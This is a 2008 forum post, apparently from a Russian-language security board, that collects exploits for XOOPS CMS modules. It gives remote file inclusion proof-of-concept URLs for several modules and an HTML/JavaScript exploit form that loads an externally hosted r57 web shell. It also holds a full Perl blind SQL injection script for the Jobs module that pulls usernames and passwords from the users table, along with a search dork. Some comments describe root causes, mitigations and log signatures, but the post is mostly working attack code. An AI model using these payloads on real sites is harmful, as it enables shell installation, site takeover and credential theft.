Старый 23.03.2008, 15:30
iddqd

RFI

Vulnerable: XOOPS Module XFsection

Vuln script: modify.php

PoC:
Код:
http://www.site.com/modules/xfsection/modify.php?dir_module=evilcode.txt?
Vulnerable: XOOPS Module XT-Conteudo

Vuln script: /admin/spaw/spaw_control.class.php
PHP код:
// Root cause: every include path below is prefixed with $spaw_root, and nothing in this
// excerpt assigns that variable. When the file is requested directly and PHP copies
// request parameters into globals (register_globals), the prefix comes from the client.
// Mitigation: refuse direct requests to this file, set the root from a server-side
// constant rather than a variable, and keep allow_url_include disabled.
include $spaw_root.'config/spaw_control.config.php';
include 
$spaw_root.'class/toolbars.class.php';
include 
$spaw_root.'class/lang.class.php'
PoC:
Код:
http://site/modules/xt_conteudo/admin/spaw/spaw_control.class.php?spaw_root=[shell]?
Vulnerable: XOOPS Module Cjay Content 3

Vuln script: /admin/editor2/spaw_control.class.php
PHP код:
// Same SPAW editor include pattern as shipped in this module's admin/editor2 directory:
// $spaw_root is never initialised in the lines shown, so its value is whatever the
// request supplies when register_globals is enabled.
// Mitigation: block direct access to the class file, derive the base path from a
// constant defined by the application, and leave allow_url_include off.
include $spaw_root.'config/spaw_control.config.php';
include 
$spaw_root.'class/toolbars.class.php';
include 
$spaw_root.'class/lang.class.php'
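Note: this only works when the PHP setting register_globals is On (so that the spaw_root request parameter becomes the $spaw_root variable) and magic_quotes_gpc is Off.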

PoC:
Код:
http://site/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=[shell ]?
Vulnerable: XOOPS Module icontent 1.0

Exploit:
Код HTML:
<html>
<head>
<meta http-equiv="Content-Type" content="text/html;
charset=windows-1254">
<title>XOOPS Module icontent v.1.0 Remote File Inclusion
Exploit</title>

<script language="JavaScript">

//'===============================================================================================
//'[Script Name: XOOPS Module icontent v.1.0
//'[Author     : Mahmood_ali
//'[S.Page     : 
http://mirror.in.th/sourceforge.net/x/xo/xoops/xoops2-mod_icontent.zip
//'===============================================================================================

//'[[V.Code]]------------------------------------------------------
//'
//'include $spaw_root.'config/spaw_control.config.php';
//'include $spaw_root.'class/toolbars.class.php';
//'include $spaw_root.'class/lang.class.php';
//'
//'[[V.Code]]---------------------------------------------------------

//# Tryag.Com
//# ...




   // Fixed pieces of the request URL; command() appends them, in this order, to the
   // base URL typed into the form.
   // Detection: a request for spaw_control.class.php whose spaw_root value is an
   // absolute URL is the access-log signature of this issue.
   var path="/modules/icontent/include/wysiwyg/"
   var adres="spaw_control.class.php" //File name
   var acik ="?spaw_root=" // Line 15 (presumably the include line in the vulnerable file; unverified)
   var shell="http://lppm.uns.ac.id/r57.txt?" // R57Shell: externally hosted file passed as the include prefix

   // Form handler wired to the onSubmit attribute of the "rfi" form.
   // Reads the base URL from the target1 field, sets the form's action to
   // base + path + adres + acik + shell, and submits it into the "getting" iframe.
   function command(){
       // An empty target field only produces an alert.
       if (document.rfi.target1.value==""){
          alert("Failed..");
      return false;
    }



  // The whole request is encoded in the action URL; the form is sent with method="post".
  rfi.action= document.rfi.target1.value+path+adres+acik+shell; // Ready
  rfi.submit(); // Form Submit
   }
</script>

</head>

<body bgcolor="#000000">
<center>

<p><b><font face="Arial" size="2"
color="#FFFFFF">XOOPS Module icontent 
v.1.0 Remote File Inclusion Exploit</font></b></p>

<p></p>
<form method="post" target="getting"
name="rfi" onSubmit="command();">
    <b><font face="Tahoma" size="1"
color="#FF0000">Target:</font><font 
face="Tahoma" size="1" 
color="#FFFF00">[http://[target]/[scriptpath]</font><font
color="#00FF00" 
size="2" face="Tahoma">
  </font><font color="#FF0000"
size="2"> </font></b>
  <input type="text" name="target1"
size="20" style="background-color: 
#808000"
onmouseover="javascript:this.style.background='#808080';" 
onmouseout="javascript:this.style.background='#808000';"></p>
  <p><input type="submit" value="Gonder"
name="B1"><input type="reset" 
value="Sifirla" name="B2"></p>
</form>
<p><br>
<iframe name="getting" height="337"
width="633" scrolling="yes" 
frameborder="0"></iframe>
</p>

<b><font face="Lucida Handwriting" size="5" 
color="#FF0000">Mahmood_ali</font></b><p>
<b><a href="http://tryag.com/cc">
<font face="Lucida Handwriting" size="5" 
color="#FFFFFF">TrYaG-Team</font></a></b></p>
</p>
</center>
</body>

</html>
Vulnerable: XOOPS Module tsdisplay4xoops 0.1

PoC:
Код:
[Path]/modules/tsdisplay4xoops/blocks/tsdisplay4xoops_block2.php?xoops_url=Shell

Remote SQL Injection

Vulnerable: XOOPS Module Jobs <= 2.4

Код:
#!/usr/bin/perl
#[Script Name: XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL
Injection Exploit
#[Coded by   : ajann
#[Author     : ajann
#[Contact    : :(
#[Dork       : "inurl:/modules/jobs/"
#[S.Page     : http://www.jlmzone.com/
#[$$         : Free
#[..         : ajann,Turkey


use IO::Socket;
# Usage guard: with no command-line argument, print the banner below and stop.
# The single argument is the host name of the site being tested.
if(@ARGV < 1){
print "
[========================================================================
[//  XOOPS Module Jobs <= 2.4 (cid) Remote BLIND SQL Injection Exploit
[//                   Usage: exploit.pl [target]
[//                   Example: exploit.pl victim.com
[//                   Example: exploit.pl victim.com
[//                           Vuln&Exp : ajann
[========================================================================
";
exit();
}
# Request parameters. None of these is declared with `my`, and the only pragma/module
# line in the listing is `use IO::Socket`, so they are all package globals.
# $kapan is appended after the uid at the very end of the injected value; presumably an
# SQL comment opener meant to neutralise the rest of the module's query (TODO confirm).
$kapan = "/*";
$server = $ARGV[0];
# Drop any "http://" so $server is a bare host name for the socket and the Host header.
$server =~ s/(http:\/\/)//eg;
$host = "http://".$server;
$port = "80";
# Endpoint and parameter concerned: the Jobs module's index.php, parameter cid.
$file = "/modules/jobs/index.php?pa=jobsview&cid=";

# Ask for the directory under which XOOPS is installed on the target site.
print "Script <DIR> : ";
$dir = <STDIN>;
# chop removes the last character unconditionally (normally the newline from STDIN).
chop ($dir);

# Any input containing "exit" aborts the run.
if ($dir =~ /exit/){
print "-- Exploit Failed[You Are Exited] \n";
exit();
}

# The directory must contain at least one "/"; otherwise the script stops.
if ($dir =~ /\//){}
else {
print "-- Exploit Failed[No DIR] \n";
exit();
 }

# Ask for the numeric user id whose row is requested from the users table.
print "User ID (uid): ";
$id = <STDIN>;
chop ($id);

# Value placed in the cid parameter: a UNION SELECT against xoops_users that returns
# uname and pass behind two markers; the char() lists decode to "username:" and
# "password:", which the response parser at the end of the script searches for.
# Detection: access-log entries for /modules/jobs/index.php whose cid contains
# "union", "select" or "xoops_users".
# Fix on the module side: treat cid as an integer or pass it as a bound parameter
# instead of concatenating it into the SQL text.
$target =
"-1%20union%20select%203,concat(char(117,115,101,114,110,97,109,101,58),uname,char(112,97,115,115,119,111,114,100,58),pass),1%20from%20xoops_users%20where%20uid%20like%20".$id.$kapan;
# Full request target: scheme + host, install directory, endpoint, injected value.
$target = $host.$dir.$file.$target;

# Open a plain TCP connection to $server on $port and write a hand-built GET request
# for $target; the script dies with a message if the connection cannot be made.
print
"+**********************************************************************+\n";
print "+ Trying to connect: $server\n";
$socket = IO::Socket::INET->new(Proto => "tcp", PeerAddr
=> "$server", PeerPort => "$port") || die
"\n+ Connection failed...\n";
print $socket "GET $target HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "Connection: close\n\n";
# "Connected" is reported only after the request has been written.
print "+ Connected!...\n";
# Read the HTTP response line by line and look for the two markers the injected
# query places around the selected columns.
# For responders: a page body from the Jobs module that contains "username:" /
# "password:" followed by account data means rows of xoops_users reached the client,
# so the affected credentials should be treated as disclosed.
while($answer = <$socket>) {
# Text between "username:" and the following "pass" is reported as the user name.
if ($answer =~ /username:(.*?)pass/){
print "+ Exploit succeed! Getting admin information.\n";
print "+ ---------------- +\n";
print "+ Username: $1\n";
}

# Text between "password:" and the next closing </b> tag is reported as the pass column.
if ($answer =~ /password:(.*?)<\/b>/){
print "+ Password: $1\n";
}

# A "Syntax error" string in the response is treated as failure and ends the run.
if ($answer =~ /Syntax error/) { 
print "+ Exploit Failed : ( \n";
print
"+**********************************************************************+\n";
exit(); 
}

# So is an "Internal Server Error" page.
if ($answer =~ /Internal Server Error/) {
print "+ Exploit Failed : (  \n";
print
"+**********************************************************************+\n";
exit(); 
}
 }
 